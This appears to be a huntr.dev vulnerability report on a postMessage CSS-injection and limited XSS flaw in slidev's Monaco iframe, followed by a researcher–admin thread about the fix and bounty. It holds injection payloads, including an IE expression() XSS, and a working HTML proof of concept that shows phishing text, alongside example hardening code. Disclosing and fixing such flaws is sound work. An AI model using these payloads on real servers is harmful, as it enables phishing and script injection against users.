External Control of File Name or Path in slidevjs/slidev

Valid

Reported on

Jan 3rd 2022


Description

Vulnerability: CSS injection and Limited XSS via postMessage

While reading the code, I came across the file packages/client/iframes/monaco/index.ts, where a message event listener is registered. The callback inserts the content of the received message directly into a <style> tag, without checking the message origin or escaping the value.

Because of this, an attacker can post a message with the following payloads:

{"type": "slidev-monaco", "data": {"style": "} div { color: expression(alert(1)); } b{"} : XSS in IE (Internet Explorer) browser

{"type": "slidev-monaco", "data": {"style": "} div { background-color: #ff0000; } b{"}: CSS injection in all browsers
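As an added example, not code from the report or from slidev, and not the fix merged upstream, the following shows one hardened shape for the kind of listener described above: the origin of every postMessage is checked against the expected parent origin, the message shape is validated, and a style value that could break out of the rule it is inserted into (closing braces, angle brackets, `expression()`, `url()`, `@import`) is rejected before anything reaches the DOM. The names EXPECTED_ORIGIN, handleMonacoMessage, isSafeStyle and the element id "code" are assumptions made for this example; the two sample messages are constructed to mirror the payloads in the report.

```javascript
// Added example, not slidev's code. Hypothetical names: EXPECTED_ORIGIN,
// handleMonacoMessage, isSafeStyle, element id "code".

// Assumption: the only page allowed to drive this iframe is the local dev server.
const EXPECTED_ORIGIN = "http://localhost:3030";

// A style value is only accepted if it cannot close the rule it is inserted into
// or pull in external resources: no braces, no angle brackets (which could end
// the <style> element), no expression()/url()/@import.
function isSafeStyle(style) {
  if (typeof style !== "string") return false;
  return !/[{}<>]|expression\s*\(|url\s*\(|@import/i.test(style);
}

// Validates one message event and hands {style, code} to `sink` only when every
// check passes. Returns a reason string so callers (and tests) can see why a
// message was dropped instead of silently ignoring it.
function handleMonacoMessage(event, sink, expectedOrigin = EXPECTED_ORIGIN) {
  // 1. Origin check: any page can call postMessage on a window it opened.
  if (event.origin !== expectedOrigin) return "rejected: origin";

  // 2. Parse defensively; the original page accepted a JSON string.
  let msg;
  try {
    msg = typeof event.data === "string" ? JSON.parse(event.data) : event.data;
  } catch {
    return "rejected: not json";
  }

  // 3. Shape check before touching any field.
  if (!msg || msg.type !== "slidev-monaco" || typeof msg.data !== "object" || msg.data === null) {
    return "rejected: shape";
  }
  const { style = "", code = "" } = msg.data;

  // 4. Content checks on the two fields that end up in the DOM.
  if (!isSafeStyle(style)) return "rejected: style";
  if (typeof code !== "string") return "rejected: code";

  sink({ style, code });
  return "accepted";
}

// Browser wiring, guarded so the same file also loads under Node for testing.
if (typeof window !== "undefined") {
  window.addEventListener("message", (event) => {
    handleMonacoMessage(event, ({ style, code }) => {
      let styleEl = document.getElementById("slidev-style");
      if (!styleEl) {
        styleEl = document.createElement("style");
        styleEl.id = "slidev-style";
        document.head.appendChild(styleEl);
      }
      // textContent (never innerHTML) for both sinks: the value is treated as text.
      styleEl.textContent = style;
      document.getElementById("code").textContent = code;
    });
  });
}

// Constructed sample messages mirroring the report's payload shape.
const ATTACKER_MESSAGE = {
  origin: "https://attacker.example",
  data: '{"type":"slidev-monaco","data":{"style":"} div { color: expression(alert(1)); } b{"}}',
};
const BENIGN_MESSAGE = {
  origin: EXPECTED_ORIGIN,
  data: JSON.stringify({ type: "slidev-monaco", data: { style: "color: #333;", code: "const x = 1;" } }),
};
```

The origin check alone stops the cross-window scenario in the report; the style filter is defence in depth for the case where a trusted parent is itself compromised or forwards attacker-controlled data.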

Proof of Concept

1 Open the following HTML file in your browser

NOTE: Please replace <SERVER-IP> and <PATH-TO-SLIDEV> with appropriate values in the following html file

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Exploit XSS and CSS-injection in slidev</title>
</head>
<body>

<script>
    function exploit(){
        var target = 'http://<SERVER-IP>:3030/@fs/<PATH-TO-SLIDEV>/node_modules/@slidev/client/iframes/monaco/index.html';

        var payload = '{"type": "slidev-monaco", "data": {"style": "} div { background-image: url(\'https://c.tenor.com/oJoWZIWxt3wAAAAC/the-hacker-matrix.gif\')} span { background-color: #ff0000; font-size: 50px; text-align: center} b{", "code": "\\nHELLO, you have been hacked. Submit your details. Phishing attempts..."}}';

        window.poc = window.open(target);

        setTimeout(function(){
            window.poc.postMessage(
                payload,
                '*'
            );
        }, 2000);
    }
</script>

<input type="button" onclick="exploit()" value="EXPLOIT">

</body>
</html>

2 Click the EXPLOIT button: a new window opens showing the injected CSS and code in the slidev server webpage

Impact

1 Execute arbitrary JavaScript code in Internet Explorer using the expression() function.

2 Inject arbitrary CSS into a slidev webpage. This can be used in phishing campaigns by manipulating users into taking unintended actions.

3 Read parts of the HTML page using CSS selectors.

We are processing your report and will contact the slidevjs/slidev team within 24 hours. 5 months ago
Rohan Sharma submitted a
5 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 5 months ago
Rohan Sharma
3 months ago

Researcher


Hi @admin It has been a month that we have not received any response from the maintainer. So, yesterday I created a PR to fix this vulnerability. The PR has been approved and merged in the official repository. https://github.com/slidevjs/slidev/pull/486

which means the vulnerability is fixed now. I have seen in hacktivity reports that if the maintainer does not join the huntr.dev platform and the vulnerability gets fixed, then @admin can validate the vulnerability and fix on behalf of the maintainer. I would like you to do the same for this report.

Note: the PR/commit title was changed by the maintainer (i.e. "fix: prevent XSS"), however it was not just an XSS. It had a wide scope along with CSSi, limited XSS on IE etc., as mentioned in my report.

Thank you

Jamie Slome
3 months ago

Admin


@r0hansh - thanks for getting in touch!

I will first try my best to get the maintainer to validate the findings first. I have dropped a message on the PR to ask if they would take a look at this report, and approve accordingly.

If we do not receive any response from the maintainer on this report, we will move on to the next step 👍

Rohan Sharma
3 months ago

Researcher


Sure, Jamie. Sounds good to me.

Rohan Sharma
3 months ago

Researcher


@jamieslome

Jamie Slome
3 months ago

Admin


@r0hansh - I have looked into this further, and can see that the fix was shared publicly on the vulnerable repository, which we consider to break the disclosure policy of our platform, as we do request that vulnerabilities are not shared elsewhere, other than on our platform, to receive bounty rewards.

We are happy to approve the report, and confirm the fix, but will have to zero out the bounties if we move forward in this way.

Before I proceed, I will wait to hear your thoughts.

Rohan Sharma
3 months ago

Researcher


@jamieslome cool. I'm fine with it.

Suggestion: Right now, we can submit the fix just after submitting a vulnerability report on huntr.dev and that fix is public too (but on the researcher's forked repo). Both ways, i.e. raising a PR on the vulnerable repository and submitting a patch on a personal forked repo, will make the fix public. So, I think that your team should find a better way to submit the fix (so that it doesn't get public in any case), e.g. only submit patched code on the huntr.dev platform, accessible only to the maintainers.

Jamie Slome
3 months ago

Admin


Thank you for your confirmation @r0hansh.

I will go ahead and approve/fix the report.

We appreciate your feedback on a way to submit private fixes and do see the need for this. If possible, I'd love for you to consolidate your feedback into a GitHub Issue on our public repository, where we can best track your request and update you with any progress:

Create feature request

Jamie Slome validated this vulnerability 3 months ago
Rohan Sharma has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on 92db17 3 months ago
Rohan Sharma has been awarded the fix bounty
index.ts#L102-L145 has been validated